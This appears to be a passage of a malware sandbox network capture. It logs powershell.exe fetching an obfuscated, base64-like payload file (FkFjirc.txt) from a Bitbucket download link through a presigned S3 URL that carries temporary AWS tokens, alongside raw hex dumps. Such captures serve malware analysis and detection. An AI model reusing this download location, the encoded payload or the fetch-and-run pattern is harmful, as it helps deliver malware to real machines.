                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: 10 80 b2 3e 6a 14 88 10 4c 81 42 e2 1a 90 a2 49 1b 61 52 93 ef 4e 1a 74 25 60 cc 73 c5 32 4a 22 61 71 3e 86 8e d1 da a0 93 c9 ee 2a 37 5f 04 b1 b0 95 b7 c9 a9 b5 94 a0 c0 1d f9 ef 56 0c 46 66 52 01 5c 71 54 e4 a9 53 cc 83 e4 69 7b 7b d5 b0 a1 27 b7 bd 54 9d 09 f6 2c 43 53 8e e5 f9 19 14 bb dd 52 0f 7e 4d 11 57 28 1d 88 91 ef 55 5b 2c ea e4 c9 3c 0f 5a 92 b6 bd 0e b6 92 4f 33 eb 54 e5 43 45 b5 a8 52 e0 97 45 c6 e5 c7 63 e5 e9 14 72 0a 92 62 3b cd 46 26 f8 23 cf b7 94 f7 a5 d9 c8 c9 f2 8f de a1 75 70 49 1b 18 f9 2e c4 47 04 f7 e4 d7 ad 32 4e 33 76 02 56 a2 27 8a 6a a7 cb 84 c9 20 0e c4 77 a5 59 28 2a 04 9e 0f 78 10 47 bd 41 3a 89 e1 63 2f 18 3c a7 de 6d 80 57 70 39 9a 7e eb a7 67 f2 ff 00 0a 6a b3 8c bf 09 60 00 40 80 05 4b d9 e5 00 24 6f 91 e9 da b3 ed a7
                                                                                                                                                                                        Data Ascii: >jLBIaRNt%`s2J"aq>*7_VFfR\qTSi{{'T,CSR~MW(U[,<ZO3TCEREcrb;F&#upI.G2N3vV'j wY(*xGA:c/<mWp9~gj`@K$o
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: bb 6e 1c 52 88 91 ed 48 38 c4 0f 41 52 ae da 11 3c f7 a4 57 6b b4 73 24 cd 4f 19 11 b8 fc 91 2e 5b 85 15 79 1a 6b 73 6f 06 23 89 e2 a5 dd b6 85 1e f1 ed 4d 2e ed ca 93 31 31 d8 0a b5 5c f2 41 35 82 19 6d 92 a2 00 04 77 92 69 25 33 12 26 7f 3e d4 fe e2 d3 69 31 22 69 aa db d8 b1 c4 03 e7 da ad 42 5c 11 31 a2 db da a0 7b 01 db de a2 b3 03 74 93 cc 9a 97 b8 4c 24 f2 60 7f f2 35 17 91 40 58 3f e5 57 2b 21 97 62 05 c6 a1 c5 12 20 1f 4a 21 82 78 23 89 a7 57 8d 02 a1 06 62 9a b8 12 8f c3 03 cb 8f 3a d0 af b1 08 d5 c7 c7 8e 11 24 10 3d 38 a5 90 b1 20 48 ed eb 49 bc 80 ae 49 e7 eb 48 1b 8f 09 64 00 0c 7b c7 ef 53 a4 03 ee 3b 2b 85 f0 af 3e d4 76 9d 1b 7b 83 f4 f2 f6 a6 0b bd 95 4f cb cf d6 bd f7 a2 be c7 8f 21 d8 d1 6d 18 94 49 49 5f 24 09 ed 4b b0 a0 a5 41 3f 32
                                                                                                                                                                                        Data Ascii: nRH8AR<Wks$O.[ykso#M.11\A5mwi%3&>i1"iB\1{tL$`5@X?W+!b J!x#Wb:$=8 HIIHd{S;+>v{O!mII_$KA?2
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: 3f b5 18 2b bc f6 a8 da f9 16 47 0d ac 6e 03 fa 69 56 57 dc 83 04 18 34 d8 28 20 00 49 1e 74 b0 54 2b b4 45 03 58 09 31 c2 14 0a 07 90 a5 d0 ae 4f 95 35 4a a4 7d 7f 7a 55 2a 93 1f bd 03 09 34 3a 42 e5 30 3b 93 cd 28 95 10 78 33 14 d9 b5 40 e0 c1 14 aa 54 24 fa 8f 5a 58 10 e1 b3 b7 ce 67 f2 a5 52 e7 3c 02 60 f9 53 54 ab cb bf b4 c5 2a 90 01 f2 83 ef 34 d8 10 bb 6a 80 79 e4 51 8f cc 41 fc e9 10 41 12 3c fd e9 44 90 63 c8 c4 9f f4 a6 7d b0 23 d1 25 5d f8 f7 ef 47 e3 68 af 22 3b c0 04 fa d1 86 d2 3b a6 83 68 80 42 8f a7 71 3d e9 4a 22 40 e4 00 3c c5 1b 77 27 91 34 62 0a 55 27 b4 48 a2 a1 26 62 40 8e 38 a5 76 89 07 89 14 55 40 24 7f d2 90 82 44 93 c0 fa d0 29 a0 7b 44 f9 51 f6 03 e9 35 ef 0a 3f aa 69 26 21 12 80 13 27 99 1e bd e8 54 c8 13 3e 7e 54 b1 40 88 f9
                                                                                                                                                                                        Data Ascii: ?+GniVW4( ItT+EX1O5J}zU*4:B0;(x3@T$ZXgR<`ST*4jyQAA<Dc}#%]Gh";;hBq=J"@<w'4bU'H&b@8vU@$D){DQ5?i&!'T>~T@
                                                                                                                                                                                        2024-10-10 11:39:36 UTC1378INData Raw: 41 23 ca 8c 1d 05 3c 18 33 14 44 93 34 1d bd c7 a5 30 85 12 b1 30 a5 1e 3f 4a 38 56 e4 81 c7 14 88 85 7c aa 23 8f 5e c6 8c 95 80 38 23 f2 a5 81 64 5f 77 b8 a2 ee e6 29 30 e9 3b 62 62 6b c8 78 83 c8 e6 69 0b 2f c0 af cb b6 37 76 f6 a3 12 12 3b 9f a5 25 b8 ab 90 27 8f 5a 12 e4 00 20 c5 2e 3c 8e a4 c3 a8 84 09 92 68 15 09 04 03 df da 8a 54 20 c8 91 ee 68 a5 7e a3 f2 a7 e3 c0 fb 83 a8 f3 cc fb d1 16 a0 0c 02 4f ed 5e 52 80 4f 30 7e b4 91 5e d3 db b1 a6 19 b0 54 a0 39 07 b7 94 51 54 47 3c f7 34 05 5e 87 bd 11 4a 1b a0 77 34 86 c8 68 f5 fa 77 ef 49 ba 47 20 f9 d0 a9 65 22 7f 6a 49 6b e7 d7 db d2 9d 21 09 38 47 ac c5 37 74 00 47 33 12 69 57 48 3e 5c 76 22 90 58 f2 f2 3c 77 a2 42 1b 3b 11 04 09 a4 5c 02 0f b5 2e e1 32 63 69 fa d2 0e 73 23 c8 fe f5 24 44 35 58 e0
                                                                                                                                                                                        Data Ascii: A#<3D400?J8V|#^8#d_w)0;bbkxi/7v;%'Z .<hT h~O^RO0~^T9QTG<4^Jw4hwIG e"jIk!8G7tG3iWH>\v"X<wB;\.2cis#$D5X


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        1192.168.2.949761185.166.143.484437696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-10 11:39:40 UTC95OUTGET /fwfsfw/fwf/downloads/FkFjirc.txt HTTP/1.1
                                                                                                                                                                                        Host: bitbucket.org
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-10-10 11:39:41 UTC5134INHTTP/1.1 302 Found
                                                                                                                                                                                        Date: Thu, 10 Oct 2024 11:39:40 GMT
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Content-Length: 0
                                                                                                                                                                                        Server: AtlassianEdge
                                                                                                                                                                                        Location: https://bbuseruploads.s3.amazonaws.com/ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/e4679797-5458-4ac6-a5d0-c8a5bc775a44/FkFjirc.txt?response-content-disposition=attachment%3B%20filename%3D%22FkFjirc.txt%22&AWSAccessKeyId=ASIA6KOSE3BNITVDYIT5&Signature=aruH8%2FKXLqbr1eotBqLDMrgcfj8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJGMEQCIBJsmv1x4kNJKo%2BlCirZ%2B%2BYSRW%2BTlanKnttCN8gqrtPUAiBWRPk4JyUK056xsTtUiEBQEKunR88JVm69Inqdk%2BvcSSqnAgh1EAAaDDk4NDUyNTEwMTE0NiIMXMqiN6K3TTT97erXKoQCownDAh%2BoC851Lrv1%2FxmNrX4svkNYfLzmICT362uzk%2FgaDF1hKE4PJreodkmm1LTArLhZj3r4PufzeON7acDfGzwwl7%2Bp8NJkuF0dOe9dRDKyeawNH074J%2BIaT1YFIyfAcLJCpGqK4%2BHNvuF0dqzlhfDm61b4aufz0WXmB4oJovp7h7QJvPBdj7%2F8diM3f6iMpVCEX0%2FZUwuB0%2BLrfwG20S37xFaegFpVfx4raoXBRiGp2RuqZyO1r%2F6Gkyu25GiHlzavAvr0%2Bwk%2Bl5O6R68D0k4CiSlmBhU2eOdtRc2tt36gxkxAgvd5Cqu2SLr630d1i2B27QAxrmv85RrvCZdXjaKk4jIwj%2FeeuAY6ngF1g0O87fUqo9nvnUxv95D2W3rIZBWwq%2FiJUGE%2FBC1DUU1ljpKhlRRLPSFLvUB%2B9uSs%2BYTYgd%2B9V9tFitQ5c6vT8MJnGcGKFGXX2N3MAMXXv5xVANZ7BGXJ47l [TRUNCATED]
                                                                                                                                                                                        Expires: Thu, 10 Oct 2024 11:39:40 GMT
                                                                                                                                                                                        Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                                                        X-Used-Mesh: False
                                                                                                                                                                                        Vary: Accept-Language, Origin
                                                                                                                                                                                        Content-Language: en
                                                                                                                                                                                        X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                                                        X-Dc-Location: Micros-3
                                                                                                                                                                                        X-Served-By: 210713beaa79
                                                                                                                                                                                        X-Version: e70d6aec7847
                                                                                                                                                                                        X-Static-Version: e70d6aec7847
                                                                                                                                                                                        X-Request-Count: 3371
                                                                                                                                                                                        X-Render-Time: 0.06752967834472656
                                                                                                                                                                                        X-B3-Traceid: d8f00041078f4c829eea3494abf208b1
                                                                                                                                                                                        X-B3-Spanid: 7d3d076d8b1d4370
                                                                                                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                        Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; frame-ancestors 'self' start.atlassian.com start.stg.atlassian.com atlaskit.atlassian.com bitbucket.org; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; base-uri 'self'; object-src 'none'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbu [TRUNCATED]
                                                                                                                                                                                        X-Usage-Quota-Remaining: 999017.269
                                                                                                                                                                                        X-Usage-Request-Cost: 1002.10
                                                                                                                                                                                        X-Usage-User-Time: 0.028802
                                                                                                                                                                                        X-Usage-System-Time: 0.001261
                                                                                                                                                                                        X-Usage-Input-Ops: 0
                                                                                                                                                                                        X-Usage-Output-Ops: 0
                                                                                                                                                                                        Age: 0
                                                                                                                                                                                        X-Cache: MISS
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        X-Xss-Protection: 1; mode=block
                                                                                                                                                                                        Atl-Traceid: d8f00041078f4c829eea3494abf208b1
                                                                                                                                                                                        Atl-Request-Id: d8f00041-078f-4c82-9eea-3494abf208b1
                                                                                                                                                                                        Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                                                        Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                                                        Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                                                        Server-Timing: atl-edge;dur=177,atl-edge-internal;dur=2,atl-edge-upstream;dur=176,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                                                        Connection: close


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        2192.168.2.94977052.217.171.2254437696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-10-10 11:39:41 UTC1173OUTGET /ac2e731e-5312-4ee4-9296-cae86cebf978/downloads/e4679797-5458-4ac6-a5d0-c8a5bc775a44/FkFjirc.txt?response-content-disposition=attachment%3B%20filename%3D%22FkFjirc.txt%22&AWSAccessKeyId=ASIA6KOSE3BNITVDYIT5&Signature=aruH8%2FKXLqbr1eotBqLDMrgcfj8%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEBwaCXVzLWVhc3QtMSJGMEQCIBJsmv1x4kNJKo%2BlCirZ%2B%2BYSRW%2BTlanKnttCN8gqrtPUAiBWRPk4JyUK056xsTtUiEBQEKunR88JVm69Inqdk%2BvcSSqnAgh1EAAaDDk4NDUyNTEwMTE0NiIMXMqiN6K3TTT97erXKoQCownDAh%2BoC851Lrv1%2FxmNrX4svkNYfLzmICT362uzk%2FgaDF1hKE4PJreodkmm1LTArLhZj3r4PufzeON7acDfGzwwl7%2Bp8NJkuF0dOe9dRDKyeawNH074J%2BIaT1YFIyfAcLJCpGqK4%2BHNvuF0dqzlhfDm61b4aufz0WXmB4oJovp7h7QJvPBdj7%2F8diM3f6iMpVCEX0%2FZUwuB0%2BLrfwG20S37xFaegFpVfx4raoXBRiGp2RuqZyO1r%2F6Gkyu25GiHlzavAvr0%2Bwk%2Bl5O6R68D0k4CiSlmBhU2eOdtRc2tt36gxkxAgvd5Cqu2SLr630d1i2B27QAxrmv85RrvCZdXjaKk4jIwj%2FeeuAY6ngF1g0O87fUqo9nvnUxv95D2W3rIZBWwq%2FiJUGE%2FBC1DUU1ljpKhlRRLPSFLvUB%2B9uSs%2BYTYgd%2B9V9tFitQ5c6vT8MJnGcGKFGXX2N3MAMXXv5xVANZ7BGXJ47ls7BqTpmUtKq49%2FuBnZOf7UaY2VfuQeEgZQctbJ6i9K [TRUNCATED]
                                                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        2024-10-10 11:39:41 UTC525INHTTP/1.1 200 OK
                                                                                                                                                                                        x-amz-id-2: iQgDHnH5vt0J9iNk1jHjSb5KH8NKYtrBM2ePRpV4b4DU5NH+V/HLTe/Ue9FZ35Kk99RpBLCf2SI=
                                                                                                                                                                                        x-amz-request-id: B6544V1PX7CF077A
                                                                                                                                                                                        Date: Thu, 10 Oct 2024 11:39:42 GMT
                                                                                                                                                                                        Last-Modified: Wed, 09 Oct 2024 20:27:31 GMT
                                                                                                                                                                                        ETag: "89accddf2e92386cdfdbfd410bfe19cd"
                                                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                                                        x-amz-version-id: bLkKwVeH5tpFPCcdG5w6yF0hBBOsM2Jy
                                                                                                                                                                                        Content-Disposition: attachment; filename="FkFjirc.txt"
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        Content-Type: text/plain
                                                                                                                                                                                        Content-Length: 81228
                                                                                                                                                                                        Server: AmazonS3
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        2024-10-10 11:39:41 UTC16384INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                        Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                        2024-10-10 11:39:41 UTC499INData Raw: 36 53 62 73 57 4b 62 69 48 30 42 4e 41 6f 4b 41 63 61 4c 45 61 6f 4c 74 78 61 70 73 49 61 45 41 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 41 42 73 68 52 41 41 41 41 41 41 41 41 41 44 41 41 41 41 41 41 41 45 41 47 47 42 41 41 41 41 41 41 41 41 4d 41 41 41 41 41 41 41 51 41 70 59 45 41 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 41 42 67 69 52 41 41 41 41 41 41 41 41 41 44 41 41 41 41 41 41 41 45 67 48 47 42 41 41 41 41 41 41 41 41 4d 41 41 41 41 41 41 41 51 41 52 49 31 63 39 41 67 71 41 6b 69 6f 52 38 38 4b 70 79 50 53 42 4d 61 68 77 4b 38 54 41 44 51 78 4d 47 52 30 4e 45 69 79 45 63 72 35 4a 39 61 55 46 62 66 5a 65 56 59 54 41 48 38 32 73 6a 63 61 62 59 45 41 41 41 41 41 41 41 41 77 41 41 41 41 41 41 41 41 41 41 53 48 52 64 66 43 46 47 35 57 63 32 30
                                                                                                                                                                                        Data Ascii: 6SbsWKbiH0BNAoKAcaLEaoLtxapsIaEAAAAAAAAwAAAAAAAABshRAAAAAAAAADAAAAAAAEAGGBAAAAAAAAMAAAAAAAQApYEAAAAAAAAwAAAAAAAABgiRAAAAAAAAADAAAAAAAEgHGBAAAAAAAAMAAAAAAAQARI1c9AgqAkioR88KpyPSBMahwK8TADQxMGR0NEiyEcr5J9aUFbfZeVYTAH82sjcabYEAAAAAAAAwAAAAAAAAAASHRdfCFG5Wc20
                                                                                                                                                                                        2024-10-10 11:39:41 UTC16384INData Raw: 6a 49 5a 55 33 64 31 65 77 31 6c 46 53 57 68 41 48 78 35 48 39 62 4f 6b 48 4f 61 41 70 43 50 54 4f 4c 6b 36 53 41 6f 4b 41 43 79 59 45 4f 72 62 65 72 54 67 44 35 70 65 79 76 76 51 71 4c 42 67 71 41 49 49 6a 52 34 73 75 35 6e 6e 36 4a 6a 65 72 54 67 44 43 70 75 45 41 71 43 67 67 4d 47 68 7a 36 6d 66 65 71 6e 38 35 4c 6b 36 53 41 6f 4b 41 43 79 59 45 4f 72 62 65 72 54 67 44 35 70 65 79 74 44 47 72 79 70 67 56 72 6b 67 6a 42 64 78 70 56 47 66 35 43 49 35 6b 44 58 69 4a 69 51 44 6c 61 65 72 54 67 44 55 44 4d 7a 58 38 6b 31 65 38 4c 6b 36 53 41 6f 4b 41 43 79 59 45 4f 72 62 65 72 54 67 44 35 70 65 79 75 76 51 71 4c 42 67 71 41 49 49 6a 52 34 73 75 35 6e 6e 36 4a 44 2f 43 70 75 45 41 71 43 67 67 4d 47 68 7a 36 6d 66 65 71 6e 63 35 4c 6b 36 53 41 6f 4b 41 43 79
                                                                                                                                                                                        Data Ascii: jIZU3d1ew1lFSWhAHx5H9bOkHOaApCPTOLk6SAoKACyYEOrberTgD5peyvvQqLBgqAIIjR4su5nn6JjerTgDCpuEAqCggMGhz6mfeqn85Lk6SAoKACyYEOrberTgD5peytDGrypgVrkgjBdxpVGf5CI5kDXiJiQDlaerTgDUDMzX8k1e8Lk6SAoKACyYEOrberTgD5peyuvQqLBgqAIIjR4su5nn6JD/CpuEAqCggMGhz6mfeqnc5Lk6SAoKACy
                                                                                                                                                                                        2024-10-10 11:39:41 UTC1024INData Raw: 36 41 41 67 41 41 51 41 4a 45 64 4d 41 41 49 41 62 6b 77 5a 6a 6b 77 54 69 2f 2f 2f 6b 65 72 54 67 44 6a 4f 41 41 45 41 61 6b 51 62 6a 41 41 77 41 77 52 43 76 4e 43 41 41 46 41 48 37 42 43 50 35 44 4f 6c 56 58 56 65 69 56 42 4a 6b 51 65 72 54 67 44 2f 2f 2f 33 52 36 42 6e 68 65 72 54 67 44 70 49 66 69 5a 6e 49 41 32 31 49 41 41 41 41 41 6d 51 62 6a 44 33 31 58 65 74 46 32 4a 6f 65 72 54 67 44 30 72 50 64 36 4a 43 65 72 54 67 44 30 51 6e 6f 65 72 54 67 44 5a 4d 66 4b 63 51 38 67 45 51 43 54 32 65 72 54 67 44 67 79 4a 61 63 69 58 6e 49 43 6b 51 31 47 4d 51 43 52 72 77 77 63 44 6e 44 45 31 5a 67 63 52 6e 7a 31 4a 61 63 69 4d 51 43 5a 33 50 66 69 52 6e 49 43 6b 51 33 39 59 6e 67 35 54 72 66 69 70 6e 49 36 54 44 66 69 52 6e 34 78 4a 4f 65 72 54 67 44 30 4d 51
                                                                                                                                                                                        Data Ascii: 6AAgAAQAJEdMAAIAbkwZjkwTi///kerTgDjOAAEAakQbjAAwAwRCvNCAAFAH7BCP5DOlVXVeiVBJkQerTgD///3R6BnherTgDpIfiZnIA21IAAAAAmQbjD31XetF2JoerTgD0rPd6JCerTgD0QnoerTgDZMfKcQ8gEQCT2erTgDgyJaciXnICkQ1GMQCRrwwcDnDE1ZgcRnz1JaciMQCZ3PfiRnICkQ39Yng5TrfipnI6TDfiRn4xJOerTgD0MQ
                                                                                                                                                                                        2024-10-10 11:39:41 UTC16384INData Raw: 6b 51 43 41 51 67 53 56 4a 2f 58 37 36 41 41 45 6a 67 6a 37 7a 30 42 63 68 49 77 65 72 54 67 44 67 41 41 6b 65 72 54 67 44 51 4e 71 31 2f 54 43 48 4a 43 41 51 48 72 4b 42 6b 51 30 78 41 41 41 41 41 59 43 74 4e 43 65 72 54 67 44 2f 65 74 46 46 45 50 49 41 41 42 4b 56 6a 43 41 51 4d 43 50 75 41 41 41 41 41 59 43 74 4e 43 65 72 54 67 44 2f 65 74 46 46 45 50 49 41 41 42 4b 56 6a 75 43 64 41 58 49 43 73 50 6f 31 2f 44 41 51 48 62 4a 42 6b 51 30 78 44 6e 49 41 42 4a 41 52 31 73 49 4a 45 6b 34 4c 30 42 63 68 45 77 65 72 54 67 44 67 41 45 6b 41 41 56 78 2f 41 41 30 78 41 53 43 42 48 54 42 37 44 4f 6c 56 44 7a 42 78 44 43 64 69 43 6e 49 41 41 41 41 71 6f 54 43 42 4a 47 41 77 44 32 41 64 41 58 6f 30 78 41 41 41 41 6b 4b 36 6b 51 51 69 41 41 41 41 75 51 41 4a 45 64
                                                                                                                                                                                        Data Ascii: kQCAQgSVJ/X76AAEjgj7z0BchIwerTgDgAAkerTgDQNq1/TCHJCAQHrKBkQ0xAAAAAYCtNCerTgD/etFFEPIAABKVjCAQMCPuAAAAAYCtNCerTgD/etFFEPIAABKVjuCdAXICsPo1/DAQHbJBkQ0xDnIABJAR1sIJEk4L0BchEwerTgDgAEkAAVx/AA0xASCBHTB7DOlVDzBxDCdiCnIAAAAqoTCBJGAwD2AdAXo0xAAAAkK6kQQiAAAAuQAJEd
                                                                                                                                                                                        2024-10-10 11:39:41 UTC1024INData Raw: 56 4a 43 68 66 53 58 59 77 65 44 41 41 45 55 6a 36 42 69 45 4a 55 74 69 79 78 67 45 4a 55 6c 49 41 41 56 4d 34 4e 77 4e 53 6b 51 30 32 41 41 55 78 59 58 41 33 41 41 55 78 51 33 41 33 41 41 55 78 49 58 43 32 66 6f 66 77 41 52 43 52 64 54 45 4a 45 6c 6f 79 4a 69 45 4a 4d 6c 34 50 77 44 41 41 4e 45 51 36 44 69 46 4a 4d 6c 49 41 50 38 2f 2f 6c 41 64 69 41 52 43 52 4a 6d 64 41 41 52 43 52 4c 53 45 4a 55 74 49 51 6b 77 56 33 6b 52 43 54 4c 43 41 41 69 77 45 36 45 51 43 52 4a 53 43 4c 4a 43 41 41 41 77 4a 4a 45 32 49 41 41 41 77 2f 45 65 72 54 67 44 51 79 46 43 52 54 4c 43 41 41 42 6f 5a 68 50 41 63 68 6b 52 43 54 4a 43 41 41 41 77 4a 4a 45 6d 49 4b 6b 77 30 69 41 41 67 46 68 6a 4f 4a 73 6b 34 77 4a 43 64 4b 66 49 2f 67 46 41 65 77 51 55 55 69 55 30 4a 56 39 65
                                                                                                                                                                                        Data Ascii: VJChfSXYweDAAEUj6BiEJUtiyxgEJUlIAAVM4NwNSkQ02AAUxYXA3AAUxQ3A3AAUxIXC2fofwARCRdTEJEloyJiEJMl4PwDAANEQ6DiFJMlIAP8//lAdiARCRJmdAARCRLSEJUtIQkwV3kRCTLCAAiwE6EQCRJSCLJCAAAwJJE2IAAAw/EerTgDQyFCRTLCAABoZhPAchkRCTJCAAAwJJEmIKkw0iAAgFhjOJsk4wJCdKfI/gFAewQUUiU0JV9e
                                                                                                                                                                                        2024-10-10 11:39:42 UTC16384INData Raw: 52 4a 43 45 4a 30 74 59 37 78 38 66 4d 42 55 55 6a 41 41 41 41 6c 69 34 44 41 58 49 41 41 49 79 54 6f 54 43 42 4a 43 48 4a 45 74 49 42 6b 51 55 69 30 52 43 52 4c 43 42 65 4a 69 44 4a 38 74 49 63 6b 51 30 69 34 51 43 54 4a 4b 50 64 2f 58 49 69 38 73 34 42 30 70 63 4f 42 6b 65 72 54 67 44 67 51 61 57 43 72 6a 44 4a 4d 74 49 79 70 67 64 69 43 6e 43 41 41 41 41 41 39 79 51 6a 65 72 54 67 44 66 56 6a 43 67 65 77 5a 67 65 72 54 67 44 67 77 52 43 52 72 67 64 69 45 52 43 66 4c 71 7a 63 41 52 43 52 35 77 2f 51 4e 36 55 64 41 58 34 41 4c 79 45 4a 63 74 34 6f 7a 78 43 4a 63 6c 44 47 6b 51 56 69 38 48 55 69 42 49 65 72 54 67 44 67 45 45 38 67 36 6e 42 41 41 41 41 41 63 51 43 52 48 44 66 4b 63 51 43 66 54 51 43 4a 38 74 49 4d 6b 77 58 69 59 51 43 64 44 49 64 4d 30 51
                                                                                                                                                                                        Data Ascii: RJCEJ0tY7x8fMBUUjAAAAli4DAXIAAIyToTCBJCHJEtIBkQUi0RCRLCBeJiDJ8tIckQ0i4QCTJKPd/XIi8s4B0pcOBkerTgDgQaWCrjDJMtIypgdiCnCAAAAA9yQjerTgDfVjCgewZgerTgDgwRCRrgdiERCfLqzcARCR5w/QN6UdAX4ALyEJct4ozxCJclDGkQVi8HUiBIerTgDgEE8g6nBAAAAAcQCRHDfKcQCfTQCJ8tIMkwXiYQCdDIdM0Q
                                                                                                                                                                                        2024-10-10 11:39:42 UTC1024INData Raw: 4a 41 5a 50 6b 41 59 43 64 4e 4b 64 4d 65 51 33 32 46 69 68 41 45 31 49 41 41 42 67 42 62 65 37 44 41 41 45 41 55 4d 34 74 50 38 65 64 42 73 41 41 41 42 41 47 37 47 6f 5a 41 59 43 64 4e 4f 38 57 47 51 48 41 41 42 41 41 54 32 49 41 41 55 45 55 41 41 45 41 41 73 62 67 41 41 45 41 38 30 78 69 59 55 6e 57 4e 42 41 51 41 41 51 50 42 61 47 43 6b 77 30 69 54 42 63 4d 41 41 41 41 41 59 62 6a 41 41 41 41 41 59 43 74 4e 4f 4d 41 41 42 67 42 43 65 37 44 30 58 58 41 4c 41 41 51 41 67 68 75 42 61 32 77 42 51 48 41 41 55 45 55 41 41 45 41 41 6f 62 67 41 41 45 41 38 55 78 69 53 55 6e 57 4e 42 41 51 41 41 51 50 42 61 47 77 78 41 67 64 4e 4f 73 58 62 42 63 4d 6f 58 58 38 35 67 43 77 44 47 51 77 44 79 67 63 54 6e 44 43 51 4e 77 42 79 4e 64 4f 4d 41 31 69 51 6d 63 4d 62 51
                                                                                                                                                                                        Data Ascii: JAZPkAYCdNKdMeQ32FihAE1IAABgBbe7DAAEAUM4tP8edBsAAABAG7GoZAYCdNO8WGQHAABAAT2IAAUEUAAEAAsbgAAEA80xiYUnWNBAQAAQPBaGCkw0iTBcMAAAAAYbjAAAAAYCtNOMAABgBCe7D0XXALAAQAghuBa2wBQHAAUEUAAEAAobgAAEA8UxiSUnWNBAQAAQPBaGwxAgdNOsXbBcMoXX85gCwDGQwDygcTnDCQNwByNdOMA1iQmcMbQ
